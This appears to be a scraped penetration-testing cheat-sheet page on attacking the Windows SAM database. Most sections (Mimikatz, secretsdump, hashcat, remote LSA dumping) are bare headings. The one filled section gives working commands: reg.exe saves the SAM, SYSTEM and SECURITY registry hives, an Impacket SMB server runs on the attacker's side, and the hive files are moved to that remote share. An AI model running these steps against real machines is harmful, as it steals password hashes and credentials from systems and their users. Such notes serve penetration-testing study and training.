Attacking SAM
Copying SAM Registry Hives
Registry Hive
Description
Dumping SAM with Mimikatz
lsadump::samUsing reg.exe save to Copy Registry Hives
reg.exe save hklm\\sam C:\\sam.save
reg.exe save hklm\\system C:\\system.save
reg.exe save hklm\\security C:\\security.save
# Send the saved files to our system
# start smbserver
smbserver.py -smb2support share .
# In Target Windows host
move sam.save \\\\ip\\share
move system.save \\\\ip\\share
move security.save \\\\ip\\shareDumping Hashes with Impacket's secretsdump.py
Cracking Hashes with Hashcat
Remote Dumping & LSA Secrets Considerations
Dumping LSA Secrets Remotely
Dumping SAM Remotely
Last updated